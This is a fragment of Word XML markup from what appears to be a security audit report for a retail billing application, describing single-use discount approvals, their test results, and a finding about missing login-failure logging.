                <v:shape id="Shape 1099" o:spid="_x0000_s1028" style="position:absolute;left:7620;width:9334;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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oqxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL2UuqmH0qSuIoJVsFAfpeBtyI7ZYHY2yW6T9N93CwVv8/E9Z7YYbCU6an3pWMHTJAFB&#10;nDtdcqHg87R+fAHhA7LGyjEp+CEPi/noboaZdj0fqDuGQsQQ9hkqMCHUmZQ+N2TRT1xNHLmLay2G&#10;CNtC6hb7GG4rOU2SZ2mx5NhgsKaVofx6/LYK3pb7lL92pn/42HTvp7RpVmdulLofD8tXEIGGcBP/&#10;u7c6zk/SFP6+iSfI+S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAqVJaKsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l923925,v2630,,4875,930,6735,2784c932520,4645,933450,6896,933450,9525r,123825c933450,135979,932520,138224,930660,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Approvals were made </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>single-use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"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consumed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>at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consumed_inv_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no</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Without that, one approval for "Rs 2,000 off a Michelin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tyre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">" could be replayed on every later sale of that product, forever. It also gives auditors a direct link from a discounted line back to the administrator who </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B223871" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="101"/>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Price tamper → 422, no stock consumed. Correct price → 201. Unapproved discount → 422. Approved discount → accepted </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumed. Replay → 422. Over-cap → 422. Another cashier's approval → 422.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF70365" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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V-11 · No security audit trail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A39F8" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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A09:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-778</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CWE-532</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Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EB7BD" w14:textId="42546820" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="44"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application recorded nothing that would let an incident be reconstructed. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Failed logins were not logged at all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB7C91"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6288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2834C1C5" wp14:editId="0AFA71C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-11132</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1047750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27007" name="Group 27007"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1047750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1047750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2078" name="Shape 2078"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1047750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043100" y="930"/>
                                  <a:pt x="1044960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4638"/>
                                  <a:pt x="1047750" y="6896"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="126454"/>
                                  <a:pt x="1046820" y="128687"/>
                                  <a:pt x="1044960" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043100" y="132407"/>
                                  <a:pt x="1040855" y="133338"/>
                                  <a:pt x="1038225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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1EC7D01" id="Group 27007" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-.9pt;width:82.5pt;height:10.5pt;z-index:-251400192" coordsize="1047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TRPQgMAADoJAAAOAAAAZHJzL2Uyb0RvYy54bWykVt1umzAUvp+0d0Dcr/yGJKhJpa1rb6at&#10;WrsHcIwJSAYj2wnJnn7HB3AISaupzQUxPn/f+Xx8Drd3h4o7eyZVKeqVG9z4rsNqKrKy3q7cPy8P&#10;XxauozSpM8JFzVbukSn3bv35023bpCwUheAZkw44qVXaNiu30LpJPU/RglVE3YiG1SDMhayIhle5&#10;9TJJWvBecS/0/cRrhcwaKShTCnbvO6G7Rv95zqj+leeKaYevXMCm8SnxuTFPb31L0q0kTVHSHgZ5&#10;B4qKlDUEta7uiSbOTpYXrqqSSqFErm+oqDyR5yVlmANkE/iTbB6l2DWYyzZtt42lCaid8PRut/Tn&#10;/lE2z82TBCbaZgtc4JvJ5ZDLyvwDSueAlB0tZeygHQqbgR/P5zNgloIsiKII1sgpLYD4CzNafH/b&#10;0BvCemdg2gbKQ50YUB9j4LkgDUNiVQoMPEmnzFZu6M+hWmtSQZ2ihoM7SAzqWZpUqoCxD3JkUyUp&#10;3Sn9yASyTfY/lO7KMhtWpBhW9FAPSwnF/WZZN0QbOwPTLJ12dFyFPS0jrsSevQhU1ObMlrNw5jrD&#10;aQPQkwKvx4qBHy3Cie6gQXebkn5lf8/1Y38xG/kGaBgR6igKfKgjCLqM+hqyoniZdKJwDkcE5ACk&#10;c/fnb9YwWYSdYZxEaDiK19UtxEsWy6QrWmtnZcjEtYBDlpcmQQiczHqUg9or+GycIEziWTxBYdEH&#10;4SJZzCdSS0oQ+bMYpf9Li6U6iMLYnzq2J2Tu85S203mfbvtF2CHrjhxbTWcWg841ZuBEuhq5RBAn&#10;pttgs5lCD+fLQfQqIUPUDlmvfu3ArimOimEQD/+dP4tgVKeDxrU8bTKTkrf5n10EyyPuXpBOuVCs&#10;K1Vz3fGS2BaA2qcmw2vTDSB9SmDo5pxonF5VqWEa87KC7hDOfbiPnT9egzfTg7u2hyt95Mx0DF7/&#10;Zjn0T5wQZkPJ7eYbl86emJmLP3ROeFOQfrf326siVPRj7POSc+syQNMzl9/vH8IHvLCQVK9s7BiO&#10;e2vpd5a0R9PNfJickPQw+cHeGmFkUWtrX8P3CsIcZWuWG5EdcVoiITCUkBoc0JhH/zFhvgDG76h1&#10;+uRZ/wMAAP//AwBQSwMEFAAGAAgAAAAhAGTXM6jdAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j0FLw0AQhe+C/2EZwVu7ScRqYzalFPVUBFtBvE2TaRKanQ3ZbZL+e6cnvc3Me7z5XraabKsG6n3j&#10;2EA8j0ARF65suDLwtX+bPYPyAbnE1jEZuJCHVX57k2FaupE/adiFSkkI+xQN1CF0qda+qMmin7uO&#10;WLSj6y0GWftKlz2OEm5bnUTRQltsWD7U2NGmpuK0O1sD7yOO64f4ddiejpvLz/7x43sbkzH3d9P6&#10;BVSgKfyZ4Yov6JAL08GdufSqNZAsxWhgFkuBq7x4ksNBhmUCOs/0f/78FwAA//8DAFBLAQItABQA&#10;BgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1s&#10;UEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxz&#10;UEsBAi0AFAAGAAgAAAAhAJxdNE9CAwAAOgkAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAGTXM6jdAAAABwEAAA8AAAAAAAAAAAAAAAAAnAUAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAACmBgAAAAA=&#10;">
                <v:shape id="Shape 2078" o:spid="_x0000_s1027" style="position:absolute;width:10477;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047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JiwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE+7bsIw&#10;FN0r8Q/WRepWbBBqUIpBCARt1SmBhe0qvk3SxtdR7Dz69/VQqePReW/3k23EQJ2vHWtYLhQI4sKZ&#10;mksNt+v5aQPCB2SDjWPS8EMe9rvZwxZT40bOaMhDKWII+xQ1VCG0qZS+qMiiX7iWOHKfrrMYIuxK&#10;aTocY7ht5EqpZ2mx5thQYUvHiorvvLca/Pr9dDwk68vXeH+9Zwn2H2HotX6cT4cXEIGm8C/+c78Z&#10;DSuVxLnxTXwCcvcLAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAZ5bCYsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l1038225,v2630,,4875,930,6735,2778c1046820,4638,1047750,6896,1047750,9525r,114300c1047750,126454,1046820,128687,1044960,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803l,123825,,9525,2790,2778c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1047750,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AuthController:73</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrote a line only when login </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>threw</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, so a wrong password produced no record and the 20-attempt spray in V-05b left no trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E69546"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7312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44EB45D1" wp14:editId="10E2460F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3437632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990600" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27009" name="Group 27009"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="990600" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="990600" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2087" name="Shape 2087"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="990600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="990600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="983705" y="0"/>
                                  <a:pt x="985950" y="930"/>
                                  <a:pt x="987810" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="989670" y="4651"/>
                                  <a:pt x="990600" y="6896"/>
                                  <a:pt x="990600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="990600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="990600" y="135979"/>
                                  <a:pt x="989670" y="138212"/>
                                  <a:pt x="987810" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="985950" y="141932"/>
                                  <a:pt x="983705" y="142863"/>
                                  <a:pt x="981075" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>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48D4CD5" id="Group 27009" o:spid="_x0000_s1026" style="position:absolute;margin-left:270.7pt;margin-top:-1.6pt;width:78pt;height:11.25pt;z-index:-251399168" coordsize="9906,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&#10;">
                <v:shape id="Shape 2087" o:spid="_x0000_s1027" style="position:absolute;width:9906;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9906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9i5xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIK3mtXDVlajlKLUQy9NPXh8bl6zSzcvS5Lq6q9vBKHHYWa+YVabwXXiTCG2nhXMpgUI&#10;4tqblq2Cw9fueQEiJmSDnWdScKUIm/XoaYWV8Rf+pLNOVmQIxwoVNCn1lZSxbshhnPqeOHvfPjhM&#10;WQYrTcBLhrtOzouilA5bzgsN9vTWUP2jf50CX3tt348f22OnDZ30rdzaUCo1GQ+vSxCJhvQffrT3&#10;RsG8WLzA/U1+AnL9BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALfn2LnEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l981075,v2630,,4875,930,6735,2791c989670,4651,990600,6896,990600,9525r,123825c990600,135979,989670,138212,987810,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,99060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8336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53A66CD6" wp14:editId="32AA4135">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5028307</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1400175" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27011" name="Group 27011"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1400175" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1400175" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2090" name="Shape 2090"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="762000" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="762000" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="755105" y="0"/>
                                  <a:pt x="757350" y="930"/>
                                  <a:pt x="759210" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="761070" y="4651"/>
                                  <a:pt x="761999" y="6896"/>
                                  <a:pt x="762000" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="762000" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="761999" y="135979"/>
                                  <a:pt x="761070" y="138212"/>
                                  <a:pt x="759210" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="757350" y="141932"/>
                                  <a:pt x="755105" y="142863"/>
                                  <a:pt x="752475" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
